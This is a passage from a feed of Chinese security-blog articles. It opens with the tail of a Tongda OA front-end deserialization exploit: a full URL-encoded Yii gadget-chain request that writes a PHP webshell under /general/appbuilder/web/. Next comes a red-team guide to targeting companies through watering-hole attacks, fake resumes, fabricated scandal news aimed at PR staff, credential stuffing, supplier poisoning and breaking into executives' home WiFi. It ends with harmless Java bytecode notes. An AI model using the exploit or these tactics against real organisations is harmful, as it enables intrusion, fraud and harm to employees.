_GET=c90e0967189ce5543daef73219235d04c98bb1ef4b2450f2c420e3302b8fa9a3O%3A23%3A%22yii%5Cdb%5CBatchQueryResult%22%3A6%3A%7Bs%3A9%3A%22batchSize%22%3Bi%3A100%3Bs%3A4%3A%22each%22%3Bb%3A0%3Bs%3A36%3A%22%00yii%5Cdb%5CBatchQueryResult%00_dataReader%22%3BO%3A17%3A%22yii%5Cdb%5CDataReader%22%3A4%3A%7Bs%3A29%3A%22%00yii%5Cdb%5CDataReader%00_statement%22%3BO%3A20%3A%22yii%5Credis%5CConnection%22%3A12%3A%7Bs%3A13%3A%22redisCommands%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22CLOSE%20CURSOR%22%3B%7Ds%3A8%3A%22hostname%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22port%22%3Bi%3A803%3Bs%3A8%3A%22password%22%3BN%3Bs%3A8%3A%22username%22%3BN%3Bs%3A17%3A%22connectionTimeout%22%3Bi%3A5%3Bs%3A11%3A%22dataTimeout%22%3BN%3Bs%3A8%3A%22database%22%3BN%3Bs%3A10%3A%22unixSocket%22%3Bb%3A0%3Bs%3A29%3A%22%00yii%5Credis%5CConnection%00_socket%22%3Bb%3A0%3Bs%3A27%3A%22%00yii%5Cbase%5CComponent%00_events%22%3Ba%3A1%3A%7Bs%3A9%3A%22afterOpen%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A21%3A%22yii%5Crest%5CCreateAction%22%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A212%3A%22file_put_contents(td_authcode(%225a4a8%2F6FGh6gHEG10fvS7RhpZU0XAvmB6bInVi8jX5iZLFxVHw%22%2C%22DECODE%22%2C%221234567890%22%2C%22%22)%2Ctd_authcode(%223298LtZStZAlJEefkEIubZv5auMUKfDygNFeVq0%2BOBhlSXozyKPL5QLBLX6VEw%22%2C%22DECODE%22%2C%221234567890%22%2C%22%22))%22%3Bs%3A11%3A%22checkAccess%22%3Bs%3A6%3A%22assert%22%3B%7Di%3A1%3Bs%3A3%3A%22run%22%3B%7Di%3A1%3Bs%3A1%3A%22a%22%3B%7D%7D%7Ds%3A30%3A%22%00yii%5Cbase%5CComponent%00_behaviors%22%3Bi%3A1%3B%7Ds%3A26%3A%22%00yii%5Cdb%5CDataReader%00_closed%22%3Bb%3A0%3Bs%3A23%3A%22%00yii%5Cdb%5CDataReader%00_row%22%3BN%3Bs%3A25%3A%22%00yii%5Cdb%5CDataReader%00_index%22%3Bi%3A-1%3B%7Ds%3A31%3A%22%00yii%5Cdb%5CBatchQueryResult%00_batch%22%3BN%3Bs%3A31%3A%22%00yii%5Cdb%5CBatchQueryResult%00_value%22%3BN%3Bs%3A29%3A%22%00yii%5Cdb%5CBatchQueryResult%00_key%22%3BN%3B%7DConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 0</p></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">执行成功后响应500，响应体如下图所示：</p><p style="text-align: center;"></p><div data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">文件生成目录：<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">/general/appbuilder/web/</p>，上述生成的poc文件目录是<p style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">/general/appbuilder/web/hgsd.php</p>。</div><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;">Reference</h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">漏洞挖掘发布者：<a href="https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247486082&idx=1&sn=f4e73271d9c8dd97c7662c05d17101a9&scene=21#wechat_redirect" style="color: rgb(30, 107, 184);font-weight: bold;border-bottom: 1px solid rgb(30, 107, 184);" data-linktype="2">烽火台实验室-【新】通达OA前台反序列化漏洞分析</a></p></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p></p>
<p></p>



<p><a href="https://xz.aliyun.com/t/12855">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=fd4f7a2a&r=1&u=http%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyOTI5MTM4OQ%3D%3D%26mid%3D2247483951%26idx%3D1%26sn%3D99d21c14d121ffe4d9b4d2f62ff1cfea">跳转微信打开</a></p>

</article>
<article>
<h1>红队信息收集方法</h1>
<p>Wed, 09 Aug 2023 11:00:00 +0800</p>
<p>
原创 <span>侠盗鲁平</span> <span>2023-08-09 11:00</span> <span style="display: inline-block;">中国香港</span>
</p>

<p></p>



<p>

</p>


<h1 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 24px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><span style="text-decoration:line-through;">面向国内企业的信息收集及钓鱼方式（瞎说）</span></h1><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">企查查、爱企查等各类企业查询大型公司子公司的账号都可以从淘宝购买，只看100%控股的子公司</p></li><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: square;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">子公司拿到服务器权限是否有可能在母公司内网</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">如果没有，是否可以通过内网渗透跨网段打到母公司</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">是否可以通过内网渗透拿到母公司oa账号、vpn账号，同源码项目源码</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">如果都没有，通过水坑攻击能否钓到内部人员pc拿到账号cookie、聊天软件、在线办公文档等权限，扩大信息收集范围</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">子公司有两种打法，刷src就看打到漏洞要不要就好了，如果是为了以红队视角刷src或者干脆就是给大甲方做红队，那么就要看</p></li></ul><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">IT系统开发外包公司</p></li><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: square;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">面对银行、大型国有企业非常好用，有很多外包公司专门服务于某银行，员工常年外派到现场开发运维系统，收集服务于银行的外包公司信息，渗透后通过权限对目标进行信息收集</p></li></ul><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">公众号、服务号、视频号</p></li><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: square;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">通过公众号服务号抖音号获取内部晋升名单等内部信息，包括内部系统、内网使用域名等信息，以及内部公司架构、服务变动</p></li></ul><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">抖音、电商账号</p></li><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: square;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">通过电商账号确认对方发货仓所在地理位置，尝试是否可能通过近源渗透货仓附近wifi、岗楼停车场监控pc进入内网进行渗透</p></li></ul><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">新闻</p></li><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: square;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">如尝试从某业务作为切入点进行渗透，可以通过新闻报道，社工相关业务负责人身份信息获取其常用账号，家庭住址等信息，通过密码泄露、近源渗透业务负责人家庭WiFi等方式，获取业务账号</p></li></ul><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">接码平台爬虫</p></li><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: square;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">通过爬取国内历史接码平台，查看目标各个平台接码平台历史账号，通过再接码或口令爆破方式获取账号权限</p></li></ul><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">用户手册、开发手册</p></li><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: square;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">通过开发手册获取系统更多域名、接口等信息，以及不同权限账号解锁的不同功能的url、和可能存在的功能，通过功能名组合猜测api</p></li></ul><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">boss直聘、脉脉</p></li><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: square;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">通过boss直聘、脉脉等信息获取内部员工姓名、出生日期，通过投递假简历方式社工，获取对方手机号、姓名、邮箱，进行社工或组合字典爆破</p></li></ul><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">通过小红书、微博等平台要求内推等方式获取员工联系方式进行社工</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">通过恶意构造影响力恶劣的假新闻要求其内部公关人员联系进行社工及钓鱼（慎用）</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">通过对方组织的社会公开比赛通过向组委会投递素材进行投毒</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">通过github进行收集</p></li><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: square;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">包括url、开放端口服务、路径、账号进行搜集</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">通过不同种类代码格式不同，如java要将域名倒置等方式根据域名组合字典进行搜索（com.baidu）</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">根据集团下具体业务（如某银行的xx贷）的中文名称、中文缩写、英文缩写、拼音、拼音缩写进行源码泄露信息收集</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">通过某子域名的页面代码特征或特使路径进行检索收集</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">通过敏感信息泄露人的follower和following和项目共同参与人收集</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">查看commit去历史版本找信息泄露</p></li></ul><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">通过语雀、看云、石墨文档、印象笔记、Baklib、OneNote、为知笔记、有道云协作等在线文档进行信息收集</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">通过搜索引擎对公开的浏览器书签插件进行搜索</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">通过运营商新闻、社会负面新闻收集企业ip段或员工ip出口服务器ip等信息（如xx ip攻击xxx，发现是xx公司所属ip，或xx运营商与xx公司签约提供xx段ip为xx公司ip）</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">对各地子公司资产、支行、业务子公司进行信息收集</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">子域名+扫描器进行web资产信息收集（端口、域名、子域名、js、测试页面、swagger-ui、ip段）</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">通过特殊认证，如企业认证获取服务的更多权限</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">通过github等平台获取已通过认证的账号对 目标提供的业务进行渗透</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">如果是to b，打下客户公司撞库，一切为了账号权限</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">加qq员工群聊一下看下群文件和聊天记录和社工、也可以看下贴吧</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">招投标信息，供应商打一下</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">服务供应商，打下来审源码或投毒</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">谷歌很好用，各类格式文件、子域名、业务名英文、业务名汉字、业务名中英文缩写，业务合作信息统统一把梭</p></li></ul><h1 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 24px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">outside的其他方式</h1><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">outside的某些论坛会记录发言人ip，对公司话题进行搜索，查看对方ip与收集到的ip交叉对比确认资产归属及员工ip</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">数据泄露论坛获取敏感信息</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">outside的赏金论坛类似乌云，查看历史漏洞资产信息</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">google文档、各类网盘看一下</p></li></ul><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483921">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=a71125b0&r=1&u=http%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyOTI5MTM4OQ%3D%3D%26mid%3D2247483921%26idx%3D1%26sn%3D536b742bad0603335f4a5042cf620261">跳转微信打开</a></p>

</article>
<article>
<h1>[下班充电计划]JAVA基础知识补全-JVM|字节码|JNA|JNR|JNI|JMX</h1>
<p>Thu, 03 Aug 2023 23:59:00 +0800</p>
<p>
<span>鲁平</span> <span>2023-08-03 23:59</span> <span style="display: inline-block;">北京</span>
</p>

<p></p>



<p>

</p>


<h2 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 22px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">参考文献</h2><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><a href="https://pdai.tech/md/java/jvm/java-jvm-class.html" target="_blank">https://pdai.tech/md/java/jvm/java-jvm-class.html</a></p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><a href="https://www.wdbyte.com/java/jmx/" target="_blank">https://www.wdbyte.com/java/jmx/</a></p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><a href="https://learn.lianglianglee.com/%E4%B8%93%E6%A0%8F/JVM%20%E6%A0%B8%E5%BF%83%E6%8A%80%E6%9C%AF%2032%20%E8%AE%B2%EF%BC%88%E5%AE%8C%EF%BC%89/11%20JDWP%20%E7%AE%80%E4%BB%8B%EF%BC%9A%E5%8D%81%E6%AD%A5%E6%9D%80%E4%B8%80%E4%BA%BA%EF%BC%8C%E5%8D%83%E9%87%8C%E4%B8%8D%E7%95%99%E8%A1%8C.md" target="_blank">https://learn.lianglianglee.com/%E4%B8%93%E6%A0%8F/JVM%20%E6%A0%B8%E5%BF%83%E6%8A%80%E6%9C%AF%2032%20%E8%AE%B2%EF%BC%88%E5%AE%8C%EF%BC%89/11%20JDWP%20%E7%AE%80%E4%BB%8B%EF%BC%9A%E5%8D%81%E6%AD%A5%E6%9D%80%E4%B8%80%E4%BA%BA%EF%BC%8C%E5%8D%83%E9%87%8C%E4%B8%8D%E7%95%99%E8%A1%8C.md</a></p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><a href="https://forum.butian.net/share/1232" target="_blank">https://forum.butian.net/share/1232</a></p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><a href="https://www.cnblogs.com/lanxuezaipiao/p/3635556.html" target="_blank">https://www.cnblogs.com/lanxuezaipiao/p/3635556.html</a></p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><a href="https://blog.csdn.net/weixin_40986713/article/details/131803534" target="_blank">https://blog.csdn.net/weixin_40986713/article/details/131803534</a></p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><strong>整理学习前人知识，拾人牙慧</strong></p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><strong>如阅读过程中有感到缺失或描述不清地方请看原始参考文章</strong></p><h2 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 22px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">字节码</h2><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">class文件头魔数及版本号</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">常量池</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">访问标志</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">类索引、父索引、接口索引</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">字段表属性</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">方法表属性</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">属性表属性</p></li></ul><div style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">文件开头的4个字节("cafe babe")称之为 <p style="font-size: 14px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);word-break: break-all;">魔数</p></div><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">后面0000为jdk编译器次版本号</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">后四位为主版本号</p><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;">Classfile /E:/JavaCode/TestProj/out/production/TestProj/com/rhythm7/Main<span style="line-height: 26px;">.<span style="color: rgb(198, 120, 221);line-height: 26px;">class</span>     //文件当前位置              <span style="color: rgb(230, 192, 123);line-height: 26px;">Last</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">modified</span> 2018-4-7</span>;   <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//最终修改时间</span>size <span style="color: rgb(209, 154, 102);line-height: 26px;">362</span> bytes    <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//文件大小</span>        MD5 checksum <span style="color: rgb(209, 154, 102);line-height: 26px;">4</span>aed8540b098992663b7ba08c65312de      <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//md5值</span>      Compiled from <span style="color: rgb(152, 195, 121);line-height: 26px;">"Main.java"</span>    <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//编译自哪个文件</span>    <span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">class</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">com</span>.<span style="color: rgb(230, 192, 123);line-height: 26px;">rhythm7</span>.<span style="color: rgb(230, 192, 123);line-height: 26px;">Main</span>    //类的全限定名      <span style="color: rgb(230, 192, 123);line-height: 26px;">minor</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">version</span>: 0  <span style="color: rgb(230, 192, 123);line-height: 26px;">major</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">version</span>: 52      //编译器的主版本号和次版本号                <span style="color: rgb(230, 192, 123);line-height: 26px;">flags</span>: <span style="color: rgb(230, 192, 123);line-height: 26px;">ACC_PUBLIC</span>, <span style="color: rgb(230, 192, 123);line-height: 26px;">ACC_SUPER</span>      //类的访问标识      <span style="color: rgb(230, 192, 123);line-height: 26px;">Constant</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">pool</span>://常量池（字面量+符号引用）//符号引用：类和接口全限定名//字段的名称和描述符号//方法的名称和描述符/*<span style="color: rgb(230, 192, 123);line-height: 26px;">JVM</span>是在加载<span style="color: rgb(230, 192, 123);line-height: 26px;">Class</span>文件的时候才进行的动态链接当虚拟机运行时，需要从常量池获得对应的符号引用再在类创建或运行时解析并翻译到具体的内存地址中*/   #1 </span>= Methodref          #<span style="color: rgb(209, 154, 102);line-height: 26px;">4</span>.#<span style="color: rgb(209, 154, 102);line-height: 26px;">18</span>         <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">// java/lang/Object."<init>":()V  方法定义</span>   #<span style="color: rgb(209, 154, 102);line-height: 26px;">2</span> = Fieldref           #<span style="color: rgb(209, 154, 102);line-height: 26px;">3</span>.#<span style="color: rgb(209, 154, 102);line-height: 26px;">19</span>         <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">// com/rhythm7/Main.m:I 声明int型变量m</span>   #<span style="color: rgb(209, 154, 102);line-height: 26px;">3</span> = Class              #<span style="color: rgb(209, 154, 102);line-height: 26px;">20</span>            <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">// com/rhythm7/Main</span>   #<span style="color: rgb(209, 154, 102);line-height: 26px;">4</span> = Class              #<span style="color: rgb(209, 154, 102);line-height: 26px;">21</span>            <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">// java/lang/Object</span>   #<span style="color: rgb(209, 154, 102);line-height: 26px;">5</span> = Utf8               m   #<span style="color: rgb(209, 154, 102);line-height: 26px;">6</span> = Utf8               I   #<span style="color: rgb(209, 154, 102);line-height: 26px;">7</span> = Utf8               <init>   #<span style="color: rgb(209, 154, 102);line-height: 26px;">8</span> = Utf8               ()V   #<span style="color: rgb(209, 154, 102);line-height: 26px;">9</span> = Utf8               Code  #<span style="color: rgb(209, 154, 102);line-height: 26px;">10</span> = Utf8               LineNumberTable  #<span style="color: rgb(209, 154, 102);line-height: 26px;">11</span> = Utf8               LocalVariableTable  #<span style="color: rgb(209, 154, 102);line-height: 26px;">12</span> = Utf8               <span style="color: rgb(198, 120, 221);line-height: 26px;">this</span>  #<span style="color: rgb(209, 154, 102);line-height: 26px;">13</span> = Utf8               Lcom/rhythm7/Main;  #<span style="color: rgb(209, 154, 102);line-height: 26px;">14</span> = Utf8               inc  #<span style="color: rgb(209, 154, 102);line-height: 26px;">15</span> = Utf8               ()I  #<span style="color: rgb(209, 154, 102);line-height: 26px;">16</span> = Utf8               SourceFile  #<span style="color: rgb(209, 154, 102);line-height: 26px;">17</span> = Utf8               Main.java  #<span style="color: rgb(209, 154, 102);line-height: 26px;">18</span> = NameAndType        #<span style="color: rgb(209, 154, 102);line-height: 26px;">7</span>:#<span style="color: rgb(209, 154, 